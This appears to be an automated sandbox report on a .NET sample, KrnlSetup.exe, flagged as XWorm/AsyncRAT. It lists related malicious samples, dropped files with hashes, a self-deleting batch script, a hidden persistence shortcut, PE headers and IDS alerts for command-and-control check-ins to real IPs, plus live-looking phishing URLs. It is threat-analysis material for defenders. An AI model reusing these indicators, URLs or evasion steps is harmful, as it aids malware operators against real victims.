TELEGRAMRU | https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com | malicious | HTMLPhisher | 149.154.167.220
TELEGRAMRU | jXN37dkptv.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | 1mr7lpFIVI.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | eEiHdLSfum.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | eEiHdLSfum.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | jKDBppzWTb.exe | malicious | AgentTesla | 149.154.167.220
CLOUDFLARENETUS | Client-built.exe | malicious | Discord Rat | 162.159.135.234
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.96.1
CLOUDFLARENETUS | sjoslin@odeonuk.com_print.svg | malicious | Unknown | 172.67.156.226
CLOUDFLARENETUS | document.pif.exe | malicious | GuLoader, Snake Keylogger | 172.67.177.134
CLOUDFLARENETUS | sjoslin@odeonuk.com_print.svg | malicious | Unknown | 172.67.156.226
CLOUDFLARENETUS | Statement 2024-11-29 (K07234).exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | Request for Quotation_10.12.2024.exe | malicious | MassLogger RAT | 104.21.67.152
CLOUDFLARENETUS | SALARY_RECEIPT.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.177.134
CLOUDFLARENETUS | https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg== | malicious | Unknown | 172.64.150.63
CLOUDFLARENETUS | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 172.67.213.48
TUT-AS | Wh2c6sgwRo.exe | malicious | DCRat, PureLog Stealer, zgRAT | 208.95.112.1
TUT-AS | mu3JuAyrj5.exe | malicious | PureLog Stealer, zgRAT | 208.95.112.1
TUT-AS | interior-design-villa-a23.lnk | malicious | MalLnk | 208.95.112.1
TUT-AS | file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar | 208.95.112.1
TUT-AS | run.cmd | malicious | Unknown | 208.95.112.1
TUT-AS | file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm | 208.95.112.1
TUT-AS | file.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
TUT-AS | f5ATZ1i5CU.exe | malicious | RedLine, XWorm | 208.95.112.1
TUT-AS | R55-RFQ.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS | YXHoexbTFp.exe | malicious | PureLog Stealer, zgRAT | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Client-built.exe | malicious | Discord Rat | 104.20.3.235, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | c2.hta | malicious | XWorm | 104.20.3.235, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | iboka6.hta | malicious | Unknown | 104.20.3.235, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Statement 2024-11-29 (K07234).exe | malicious | AgentTesla | 104.20.3.235, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | SALARY_RECEIPT.exe | malicious | Snake Keylogger, VIP Keylogger | 104.20.3.235, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 104.20.3.235, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | aXxRRIGARH.exe | malicious | Unknown | 104.20.3.235, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | aXxRRIGARH.exe | malicious | Unknown | 104.20.3.235, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Dfim58cp4J.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.20.3.235, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Wh2c6sgwRo.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.20.3.235, 149.154.167.220
                                                                              No context
                                                                              Process:C:\Users\user\Desktop\KrnlSetup.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):89600
                                                                              Entropy (8bit):5.976406595215718
                                                                              Encrypted:false
                                                                              SSDEEP:1536:joG1/tjFDlZvSjvSr4wMiwTlVr6sQOvtbw++0W/QaIOAVg6h55OA34MKq5:joGjJD7EvBw7Y16sXvtbw+88OK5OA34C
                                                                              MD5:493AC3E54BAE1F0D5A31B68348352F6C
                                                                              SHA1:170C49A1115624E8FC5CAFE7C33F76E54CF31C7A
                                                                              SHA-256:C89625E4304D4708308A8A4138AF28B90D490E8BD29CCDF3BC1F567D9644A7D7
                                                                              SHA-512:5BAD0866843DD49D0197F38F9F9A9ED745373B4CEA2A6C70A1A1DC81B3FF8913B0B4825653BE71E7B65B93886BB27419BD7D61045476FEE13547F8D85ACF65BB
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\ntoskrnl.exe, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._Mg.................T...........q... ........@.. ....................................@..................................q..W.................................................................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............\..............@..B.................q......H........q..........&.....................................................(....*.r...p*. ."..*..(....*.r7..p*. ....*.s.........s.........s.........s.........*.r...p*. M.).*.r...p*. o...*.r?..p*. *p{.*.r...p*. m(..*.r...p*. '^..*..((...*.r...p*. .O..*.rA..p*. ..e.*.(-...-.(....,.+.(/...,.+.(,...,.+.(+...,..(e...*"(....+.*&(,...&+.*.+5sr... .... .'..os...(,...~....-.(e...(W...~....ot...&.-.*.r...p*. ....*.r-..p*. t...*.r...p*.r...p*.r5..p*. S...*.r...p*.r...p*.r=..p*. $M..*.r..
                                                                              Process:C:\Users\user\Desktop\KrnlSetup.exe
                                                                              File Type:CSV text
                                                                              Category:dropped
                                                                              Size (bytes):1727
                                                                              Entropy (8bit):5.3718223239563105
                                                                              Encrypted:false
                                                                              SSDEEP:48:MxHKQwYHKGSI6o6+vxp3/elZHNpOtHTHhAHKKkt1qHGIs0HKD:iqbYqGSI6o9Zp/elZtpOtzHeqKktwmjB
                                                                              MD5:9714380A7DC1A8945C07B6C9DC8312B0
                                                                              SHA1:E6DF51F4C72B17485883378FDBF28D6BB5CFFDF3
                                                                              SHA-256:1DD30FC94BA3D3F97B5F250110A2639430AEB51FAE7A252F886AE2401EC31D4B
                                                                              SHA-512:876FB2C042F5FC60F6ACE9D143BA1A3AC9E200124EA3CB12476D10D24D82B4F2394F045E56FEB8906872D01B00BF9E646DEECC384144E21AEB6D6C10A365FB10
                                                                              Malicious:true
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.
                                                                              Process:C:\ProgramData\ntoskrnl.exe
                                                                              File Type:CSV text
                                                                              Category:dropped
                                                                              Size (bytes):654
                                                                              Entropy (8bit):5.380476433908377
                                                                              Encrypted:false
                                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                              Malicious:false
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):64
                                                                              Entropy (8bit):0.34726597513537405
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlll:Nll
                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                              Malicious:false
                                                                              Preview:@...e...........................................................
                                                                              Process:C:\Users\user\Desktop\KrnlSetup.exe
                                                                              File Type:Generic INItialization configuration [WIN]
                                                                              Category:dropped
                                                                              Size (bytes):58
                                                                              Entropy (8bit):3.598349098128234
                                                                              Encrypted:false
                                                                              SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
                                                                              MD5:5362ACB758D5B0134C33D457FCC002D9
                                                                              SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
                                                                              SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
                                                                              SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
                                                                              Malicious:false
                                                                              Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Desktop\KrnlSetup.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):5.028112349085952
Encrypted:false
SSDEEP:3:mKDDCMNqTtv3Dt+WfHvhs9uXZRQVkiwDwU1hGDt+kiE2J5xAInTRIJqZPy:hWKqTtLwQO9upRl9DNewkn23fTpk
MD5:64EA01444BCEEFA3D7174A111270F55D
SHA1:80BE3624E3780093DB9B3BA89B65EE3E1A35D4C9
SHA-256:EFC80BEFF463761713DB696849A2B41E39EE2049D34699FBA0194F87BAF8536B
SHA-512:131DA521C7830F2E2AB7E2BAC57A8A7F3EE36BA06CB7102693D0320C29215E93C6DEBB54F7F3D2E9D3ABE0CD49340483542C63A3730068F07D899944C079B4E6
Malicious:false
Preview:@echo off..timeout 3 > NUL..CD C:\Users\user\Desktop..DEL "KrnlSetup.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpF6F2.tmp.bat" /f /q..
Process:C:\Users\user\Desktop\KrnlSetup.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Dec 10 08:04:55 2024, mtime=Tue Dec 10 08:04:55 2024, atime=Tue Dec 10 08:04:55 2024, length=89600, window=hide
Category:dropped
Size (bytes):670
Entropy (8bit):4.614355425934263
Encrypted:false
SSDEEP:12:8l6qgcCy6keKN6+XjArb97NeD6b3nBmV:8G8DxzA/ei3nBm
MD5:5737A23649199E68AC6E5CE7DD28A5FD
SHA1:0725FA65D75328923CAAD50E0B03648776F7540F
SHA-256:CE47A19F03F3F84EAE841538F581FA3C9A62AB5DA44A7113D60A37CFB494C7A0
SHA-512:B411A26957EA1968079C9F723989DB7F3612066CE5F3A78315981A6B8528F1F6A86072D97D7A5BA5B5D41C804EA2C5BB98DBA3B1637982E76C0D9D36D880767F
Malicious:false
Preview:L..................F.... .....J.....J.....J...^...........................P.O. .:i.....+00.../C:\...................`.1......YyH. PROGRA~3..H......O.I.YyH....g.........................P.r.o.g.r.a.m.D.a.t.a.....f.2..^...Y.H ntoskrnl.exe..J......Y.H.Y.H....C.........................n.t.o.s.k.r.n.l...e.x.e.......J...............-.......I...........l........C:\ProgramData\ntoskrnl.exe..3.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.n.t.o.s.k.r.n.l...e.x.e.`.......X.......445817...........hT..CrF.f4... .tf.....,.......hT..CrF.f4... .tf.....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
Process:C:\Windows\System32\timeout.exe
File Type:ASCII text, with CRLF line terminators, with overstriking
Category:dropped
Size (bytes):60
Entropy (8bit):4.41440934524794
Encrypted:false
SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
MD5:3DD7DD37C304E70A7316FE43B69F421F
SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
Malicious:false
Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):5.976406595215718
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name:KrnlSetup.exe
File size:89'600 bytes
MD5:493ac3e54bae1f0d5a31b68348352f6c
SHA1:170c49a1115624e8fc5cafe7c33f76e54cf31c7a
SHA256:c89625e4304d4708308a8a4138af28b90d490e8bd29ccdf3bc1f567d9644a7d7
SHA512:5bad0866843dd49d0197f38f9f9a9ed745373b4cea2a6c70a1a1dc81b3ff8913b0b4825653be71e7b65b93886bb27419bd7d61045476fee13547f8d85acf65bb
SSDEEP:1536:joG1/tjFDlZvSjvSr4wMiwTlVr6sQOvtbw++0W/QaIOAVg6h55OA34MKq5:joGjJD7EvBw7Y16sXvtbw+88OK5OA34C
TLSH:EC937C1837F90525E2FF9FB00DF57696CA75F6632A03D25F108A018A1713A88CE917FA
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._Mg.................T...........q... ........@.. ....................................@................................
Icon Hash:90cececece8e8eb0
Entrypoint:0x4171fe
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x674D5F9D [Mon Dec 2 07:19:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x171a4 | 0x57 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x18000 | 0x4d6 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x15204 | 0x15400 | e970fdd02fb0a14ff56ad851b5256e1d | False | 0.5965073529411765 | data | 6.0359861530406205 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x18000 | 0x4d6 | 0x600 | c0af2bb8a48129ec7ca88e3acbe03ef9 | False | 0.3763020833333333 | data | 3.7404644026258285 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x1a000 | 0xc | 0x200 | 9988ded23b35b558e2802297974b66c9 | False | 0.041015625 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0x180a0 | 0x24c | data | | | 0.47278911564625853 |
| RT_MANIFEST | 0x182ec | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041 |
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-10T10:05:01.393762+0100 | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 1 | 192.168.2.4 | 49745 | 149.154.167.220 | 443 | TCP |
| 2024-12-10T10:05:14.455517+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 115.69.183.222 | 37593 | 192.168.2.4 | 49751 | TCP |
| 2024-12-10T10:05:14.479696+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49751 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:19.229984+0100 | 2853192 | ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound | 1 | 192.168.2.4 | 49751 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:19.909745+0100 | 2853191 | ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound | 1 | 115.69.183.222 | 37593 | 192.168.2.4 | 49751 | TCP |
| 2024-12-10T10:05:20.388438+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:20.388438+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:20.508839+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:20.508839+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:20.629374+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:20.629374+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:20.748806+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:20.748806+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:20.868343+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
